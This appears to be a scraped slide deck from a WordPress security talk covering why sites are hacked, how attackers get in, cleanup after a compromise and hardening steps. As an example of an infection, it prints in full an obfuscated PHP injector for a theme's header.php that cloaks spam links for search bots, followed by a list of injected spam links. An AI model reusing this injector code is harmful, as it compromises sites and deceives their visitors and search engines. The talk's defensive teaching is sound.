Upload
justin-jones
View
1.313
Download
1
Tags:
Embed Size (px)
Citation preview
Justin Jones • Fort Wayne, IN @jjonesftw
I’m Justin Jones
0Teacher
0 Church Worker
0WordPress hobbyist
0 Podcast cohost at“The Weekly Theme Show”
0@jjonesftw
0 justinjones.net
Why would someone want to hack my site?
0The world doesn’t revolve around you
0 Crime of opportunity
0 Don’t leave your front door unlocked
0 “Black Hat” SEO
0To make money directly
0 Affiliate sales
0 Rogue virus scanners
0 Ransomeware
Why would someone want to hack my site?
0 Serve up images and content for SPAM email
What do they do while they’re poking around my site?
0Alter robots.txt
0 Override the WordPress generated robots.txt to add their pages into search engines
0 Create backdoors in unsuspecting .php files for future attacks
0Add their own .php files and images to serve up their payload content
0 Some are specific to “robots” or HTTP Referrer
What do they do while they’re poking around my site?
0 Inject code into theme files, like header.php<? //1234$GLOBALS['_2008634924_']=Array('error_re' .'porting','function_e' .'xi' .'st' .'s','fop' .'e' .'n','fwrite','' .'f' .'clos' .'e','' .'s' .'trstr','strtolower','ex' .'p' .'lode','ip2long','i' .'p2l' .'ong','l' .'ong2ip','ip2long','' .'fi' .'le_exists','pre' .'g_mat' .'ch','file_ge' .'t_contents','pr' .'eg_match','f' .'i' .'le' .'_get' .'_c' .'ont' .'ent' .'s','u' .'nseriali' .'ze','count','range','a' .'rra' .'y_splice','array_' .'values','preg' .'_matc' .'h','file' .'_get_' .'contents','un' .'ser' .'ial' .'iz' .'e','gzuncompress','base' .'64_deco' .'de','' .'str' .'len'); function _1572011439($i){$afa=Array('Ym90a28=','ZmlsZV9wd' .'XRf' .'Y2' .'9ud' .'GV' .'udHM=','dw==','Z29v' .'Z' .'2' .'xl','c2x' .'1cnA=','' .'bXN' .'uY' .'m' .'90','Yml' .'u' .'Z2JvdA==','Ym90','Y' .'3' .'Jhd2' .'w' .'=','' .'c3BpZGV' .'y','cm9' .'ib3Q=','' .'SH' .'R0cENsaWVudA=' .'=','' .'Y3' .'V' .'y' .'b' .'A' .'==','' .'c2' .'Nvb3Rlcg==','d3d3c3' .'Rlcg==','' .'UHl0aG9' .'u','' .'dX' .'J' .'sb' .'Gli','cG' .'Vyb' .'A=' .'=','bGlid3d3','b' .'HlueA==','VkIgUHJva' .'mVjd' .'A=' .'=','U' .'Hl0aG' .'9uLXVybGxpYi8yL' .'j' .'Y=','TW9' .'6a' .'Wx' .'sYS' .'82N' .'jYuKD' .'Y' .'p','TW9' .'6' .'aWxs' .'YS80L' .'jAgK' .'GNvbXB' .'hdGli' .'b' .'G' .'U7IE1' .'TS' .'UUgNi4w' .'OyBXa' .'W5kb3dzIE5UIDUuMS' .'k=','T' .'W96aWx' .'sYS' .'8' .'0LjA' .'g' .'KGNv' .'bX' .'Bh' .'dGl' .'i' .'bGU' .'7KQ==','' .'TW96aWxsYS80' .'LjAgK' .'GNvbXB' .'hdGlibG' .'U7IE1TSUUgNS4w' .'MDsg' .'V' .'2luZG' .'93cyA5OCk=','' .'TW' .'96' .'aWxsYS8' .'0LjAgKG' .'NvbXBhdGlibG' .'U7I' .'E' .'1' .'TSUUg' .'N' .'i4wO' .'yBX' .'aW5' .'kb3dzIE5UIDUuMTsg' .'U1YxK' .'Q' .'==','' .'TW96' .'aWxs' .'YS80' .'LjAg' .'KGNvb' .'X' .'Bh' .'dGlibGU7IE' .'1TSUUgN' .'i4wOyBXaW5kb3dzIE5UIDU' .'uMTsgLk5FV' .'C' .'BDTF' .'IgM' .'S4wL' .'jM' .'p','Lw==','Lm' .'N' .'vcmU' .'=','fDxpc' .'D4oLiopPC9pc' .'D58VWl' .'z','LmNvcmU=','' .'fDx' .'p' .'cD4' .'oLiopPC9pc' .'D58V' .'W' .'lz','bGlj' .'ZW' .'5zZ' .'S50eH' .'Q=','U' .'kVNT1RF' .'X0' .'FERFI=','SF' .'R' .'U' .'UF9VU0' .'VSX0FH' .'RU' .'5U','Ym90' .'a2' .'8=','fDx' .'pbnQ+KC4q' .'K' .'T' .'wv' .'aW50Pnx' .'VaX' .'M=','bGljZW5zZS50' .'eHQ=','' .'UkVR' .'VUV' .'TVF9VUkk=','' .'PGJ' .'yPg' .'==');return base64_decode($afa[$i]);} if(isset($_GET[_1572011439(0)])){}else{$GLOBALS['_2008634924_'][0](0);}if(!$GLOBALS['_2008634924_'][1](_1572011439(1))){function l__0($_0,$_1){$_2=@$GLOBALS['_2008634924_'][2]($_0,_1572011439(2));if(!$_2){return false;}else{$_3=$GLOBALS['_2008634924_'][3]($_2,$_1);$GLOBALS['_2008634924_'][4]($_2);return $_3;}}}function l__1($_4){$_5=array(_1572011439(3),_1572011439(4),_1572011439(5),_1572011439(6),_1572011439(7),_1572011439(8),_1572011439(9),_1572011439(10),_1572011439(11),_1572011439(12),_1572011439(13),_1572011439(14),_1572011439(15),_1572011439(16),_1572011439(17),_1572011439(18),_1572011439(19),_1572011439(20),_1572011439(21),_1572011439(22),_1572011439(23),_1572011439(24),_1572011439(25),_1572011439(26),_1572011439(27));foreach($_5 as $_6){if($GLOBALS['_2008634924_'][5] ($GLOBALS['_2008634924_'][6]($_7),$_6)){return($_6);}}return(false);}function l__2($_8,$_9){$_10=$GLOBALS ['_2008634924_'][7](_1572011439(28),$_8);$_11=$GLOBALS['_2008634924_'][8]($_10[0]);$_12=$GLOBALS['_2008634924_'][9]($_10[1]);$_13=$GLOBALS['_2008634924_'][10]($_12)== $_10[1]?$_12:0xffffffff <<(32-$_10[1]);$_14=$GLOBALS['_2008634924_'][11]($_9);return($_14&$_13)==($_11&$_13);}function l__3($REMOTE_ADDR){if($GLOBALS['_2008634924_'][12](_1572011439(29))){$GLOBALS['_2008634924_'][13](_1572011439(30),$GLOBALS['_2008634924_'][14](_1572011439(31)),$_15);}else{$GLOBALS['_2008634924_'][15](_1572011439(32),$GLOBALS['_2008634924_'][16](_1572011439(33)),$_15);}$_16=$GLOBALS['_2008634924_'][17]($_15[1]);foreach($_16 as $_9){if(l__2($_9,$REMOTE_ADDR))return true;}return false;}function l__4($_17,$_18){$_19=($_17*25173+13849)%$_18;return (int)$_19;}function l__5($_20,$_21,$_18){$_22=array();$_23=$GLOBALS['_2008634924_'][18]($_20);if($_23<$_18){return false;}$_24=$GLOBALS['_2008634924_'][19](0,$_23-1);$_21=$_21%$_23;for($_25=0;$_25<$_18;$_25++){$_26=l__4($_21,$_23--);$_22[]=$_20[$_24[$_26]];if(!$_23){break;}$GLOBALS['_2008634924_'][20]($_24,$_26,1);$_24=$GLOBALS['_2008634924_'][21]($_24);$_21=$_26;}return $_22;}$_27=l__3($_SERVER[_1572011439(34)]);$_28=l__1(@$_SERVER[_1572011439(35)]);if($_27 or isset($_GET[_1572011439(36)])or $_28){$GLOBALS['_2008634924_'][22](_1572011439(37),$GLOBALS ['_2008634924_'][23](_1572011439(38)),$_29);$_30=$GLOBALS['_2008634924_'][24]($GLOBALS['_2008634924_'][25]($GLOBALS['_2008634924_'][26]($_29[1])));$_31=l__5($_30,100+$GLOBALS['_2008634924_'][27]($_SERVER[_1572011439(39)]),75);for($_25=0;$_25<75;$_25++)echo $_31[$_25] ._1572011439(40);} //1234?>
What do they do while they’re poking around my site?
0 Inject code into theme files, like header.php<a href="http://oakhurstchurch.com/news/index.php?p=alison-carroll-hot">alison carroll hot</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=jessica-lowndes">Jessica Lowndes</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=zelda-williams">zelda williams</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=bush">bush</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=teresa-scanlan">Teresa Scanlan</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=leyla">leyla</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=heather-mills">Heather Mills</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=keshia-knight-pulliam-polly">keshia knight pulliam polly</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=moira-kelly-biography">moira kelly biography</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=smurfs">smurfs</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=laurene-jobs">Laurene jobs</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=bransales-importadora">bransales importadora</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=boo-boo-stewart">boo boo stewart</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=irina-shayk-y-cristiano-ronaldo">irina shayk y cristiano ronaldo</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=vanessa-angel">Vanessa Angel</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=lineas-del-metro-mexico-df">lineas del metro mexico df</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=brian-urlacher">brian urlacher</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=jessie-palmer">jessie palmer</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=jessie-palmer">Jessie Palmer</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=mark-hamill-before-and-after-crash">mark hamill before and after crash</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=jessica-jane-clement">jessica-jane clement</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=ashanti">ashanti</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=linea-del-metro-ciudad-de-mexico">linea del metro ciudad de mexico</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=lady-antebellum-photos">lady antebellum photos</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=heidi-range">heidi range</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=miley-cyrus-nude">miley cyrus nude</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=elizabeth-hurley">elizabeth hurley</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=ty-pennington-girlfriend">Ty Pennington Girlfriend</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=lsm05">lsm05</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=ls-magazine-pics">ls magazine pics</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=megan-mullally-naked">megan mullally naked</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=ls-model">ls model</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=mensagens-lindas">mensagens lindas</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=justin-bieber-bulge">justin bieber bulge</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=lg-esteem-review">lg esteem review</a>
How Do They Get In?
0Outdated versions of WordPress
0Outdated themes and plugins
0Hosting providers behind the times
0 Insecure password / brute force
0 Compromised computer0 Passwords cached in FTP clients, passwords stored in an
unencrypted text file etc…
0Unsecure internet connection0 Rogue access points
0 Packet sniffers on public WiFi
What are the consequences?
0Google will punish you.
0 Google Safe Browsing or manual removal action
What are the consequences?
0Google will punish you.
0 Google Safe Browsing or manual removal action
What are the consequences?
0Google will punish you.
0 Google Safe Browsing or manual removal action
What are the consequences?
0Other “blacklisting” like Norton Safe Web, Phish Tank, Opera, Sucuri, and many others
0 Spammy content will get indexed with every search engine
0 Don’t forget about directory listing sites, like Google Places / Google Maps
0 Your host may dump you for violating TOS
0Be a good neighbor!
What are the consequences?
0Be a good neighbor! Security is everyone’s responsibility
What are the consequences?
0Malware cost the US economy 2.2 billion dollars in lost productivity in 2011
0Are you an ecommerce site?
0 Payment gateway is probably offsite, but what about people’s email addresses?
0Membership site?
0 Many people re-use passwords
0 Linked In, Last.fm, many others recently
0Business or organization?
0 How much street cred will you earn serving content from exotic-dildos.co.cc
Is WordPress insecure?
0No.
0 Pharma hack had a patch out before exploited
0WordPress has a target on its back
0 WordPress is used by over 14.7% of Alexa Internet's "top 1 million" websites and as of August 2011 manages 22% of all new websites.
0 Some theme and plugin authors are lazy/sloppy, or use depreciated/inefficient methods
0 You are your own worst enemy!
0 Think about Windows XP back in like 2002
Is WordPress insecure?
0Be careful who you trust
0 Everyone is a “developer” now
0 NEVER download and install a theme for free that you should have paid for
0Shady scraper sites, torrents, etc…
0 “Having a website *should* cost you more than $300 a year. If it doesn’t, then you’re doing it wrong.” --Otto
Is WordPress insecure?
0Be careful who you trust
0 Be very wary of downloading a free theme outside of the WordPress.org theme repo
0Use “Theme Authenticity Checker” and “Theme Check”
0Siobhan McKeown at WPMU.org Google’d “free wordpress themes”0 Top 10 results: 1=wordpress.org; 1=poorly coded; 8=actively using
encrypted code to insert spammy links
0 Use trusted theme marketplaces or commercial shops
Prepare for Disaster
0 It’s going to happen
0Maintain regular backups0 Server side or Plugins
0Be registered with Google Webmaster Tools
0Know how to contact your hosting provider
0Know a developer
0Visit your site
0Watch your stats
Update. Update. Update.
0 Source: http://churchm.ag/wordpress-updates/
Update. Update. Update.
0August 2011, so 3.2.1 was most current
0 Less than half of the top 100k sites running WordPress were up to date!
0WordPress interates quickly to patch security holes. Keep updated to benefit from their work
0 Source: http://churchm.ag/wordpress-updates/
Update. Update. Update.
0WordPress core, .org plugins and .org themes can use the core update functionality
0 Some commercial theme and plugins have their own way of one click upgrade, some are manual only
0 Some have notifications, some don’t
0 Sign up for WordPress.org release notifications from download page
Here’s Where This Gets Technical
0 I’ll have these slides up on Slide Share
0 I’ve reserved time at the end for questions, and I’ll be available after for individual questions
It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?0Take a deep breath and crack open a beer. You’ve got
some work ahead of you.
0Get back control of your site
0Get the site offline if you can!
It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?0 Change *every* single one of your passwords
0 Domain registrar, hosting account, all WordPress users, SQL database username and password, FTP account password
0 I suggest changing your email account passwords
0Hire a professional
0 Check out http://sucuri.net/
0 Many others out there, Google them up!
It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?0 Regenerate WordPress secret keys / salts
0 Manually in wp-config.php or use a plugin
define('AUTH_KEY', 'n%foh;/v6$)0<t]=Be]o~2L?nopubK;b1-P(x=~dCyY[pL]^Ry//=I$y.w-8&HGP');
define('SECURE_AUTH_KEY', 'q#h,K.OZ=-IT)(-`3`)G1Kr-&ZP,!CEM1<sMx-1eDI<H*BfO2G@~ bD<)]8rW|{/');
define('LOGGED_IN_KEY', 'Vuvu|_`AGu@) >*7K~l]B1v-d3-e}<Qo#hki8Fy(Bov:T~wOm#8hqHZbWP2khxR}');
define('NONCE_KEY', 'B&8:S*:tZR700I9]3~sWI0Rv1+9e_O{KXcc+`a!eB-wV$+Cctv$q*Yb+c.5w<xns');
define('AUTH_SALT', 'bpx*[xMhU<FjufQ*``oc&NNdvz,-FJ=|~+$G:i9qaCFRY>u,-}%-Cc-G|!5r0|D@');
define('SECURE_AUTH_SALT', 'S+C/f6B6[Y+uGJt!@K|c:49tA}xB!5_zE6RZ+ AT.bsFNvD^-YGOI@HG8V:YbR?q');
define('LOGGED_IN_SALT', '~oP,M4HQ8 ,M$<A[(`HZ@>_BC,Yo/Y].kw+{g^KnLPzB[UAI_Z6h6M+KbZ|.|<$-');
define('NONCE_SALT', 'KW*LbM<2qL7LAZZ!vdto?c?!(5eSb)|o$BA;{F-CLZB=M%_QfbdW[@lSDT_]ImE[');
It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?0Backup
0Restore from a previous backup
0 Find and delete all the junk they added
0 Very insidious. Creating rogue sitemaps, modifying .htaccess files, creating backdoors, adding index.php files to override permalinks, etc…
0 Adding posts and images to database
0Reinstall WordPress core, plugins and themes
It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?0Begin the process of restoring your good name
0 Request delisting of bogus content from Google and other search engines
0Very tedious, manual process
0 Request reevaluation from blacklisting services
0 Don’t forget about other services that pull content from your site, like Google places
0 Wait it out. This will take weeks and months
0 Prepare better for next time
Harden Your Site.The Easy Stuff.
0Keep up to date! WordPress, plugins, themes – but also PHP version on your host
0Use strong passwords – no words! Not P@$$woRd either.
0 Consider using a password manager
0Remove “admin” user
Harden Your Site.The Easy Stuff.
0Only connect using SFTP
0Never ever hack core WordPress files
0Keep a clean house!
0 Other WP installs, other PHP services, plugins, old themes
0Disable user registration
Harden Your Site.The More Complicated Stuff.0 Store your wp-config file outside of public_html
0 Done at install or can be moved later
0 Change the database prefix
0Use strong database passwords
0Use proper 755 file permissions
0 If a plugin or theme asks you to set 777, avoid.
Harden Your Site.The More Complicated Stuff.0Only log in to site using SSL (https://...)
0Don’t advertise that you’re running an out of date version
0 Remove readme.html (plugins available)
0 Remove WordPress version from header (plugins available)
Harden Your Site.The More Complicated Stuff.0 Plugins! Plugins! Plugins!
0 Monitor core / template files
0 “WordPress File Monitor Plus”
0 Scan template files for suspicious code
0 “AntiVirus”
0 WP and server security settings
0 “WebsiteDefender WordPress Security”
0 Keep up to date
0 “Update Notifications”
Harden Your Site.The More Complicated Stuff.0 Plugins! Plugins! Plugins!
0 “WordPress Firewall 2”
0 “Block Bad Queries”
0 Backup
0VaultPress
0BackupBuddy
0 Login Lockdown
0Lock out excessive retries and mask login errors
0 Many others available for two factor auth, etc…
0 Sucuri plugin has a firewall to block known bad IP’s
Should you really be hosting your own site?
0Do you like to change your own oil in your car or take it to the Jiffy Lube?
0WordPress.com is a great resource for most personal bloggers. Focus on writing your content.
0 Consider a WordPress managed host.
0 WP Engine, ZippyKid, Pagely, etc…
0Don’t be afraid to pay someone!
0 How important is this project?
0 What is your time worth?
Resources
0 Codepoet.com
0 eBook “Locking Down WordPress”
Resources
0These slides on Slide Share
0 Search for slides from Dre Armeda and Brad Williams
0WordPress.org Codex
0Otto on WordPress
0 Sucuri.net – service and blog
0 Lockdown WordPress – A Security Webinar with Dre Armeda
0 1.5 hour interview – great resource!
0 Countless plugins on the WordPress.org repo
0 http://sitecheck.sucuri.net/scanner/
Questions?
0No question is stupid. We’re all here to learn!
0 If you’re smarter than I am, please jump in here.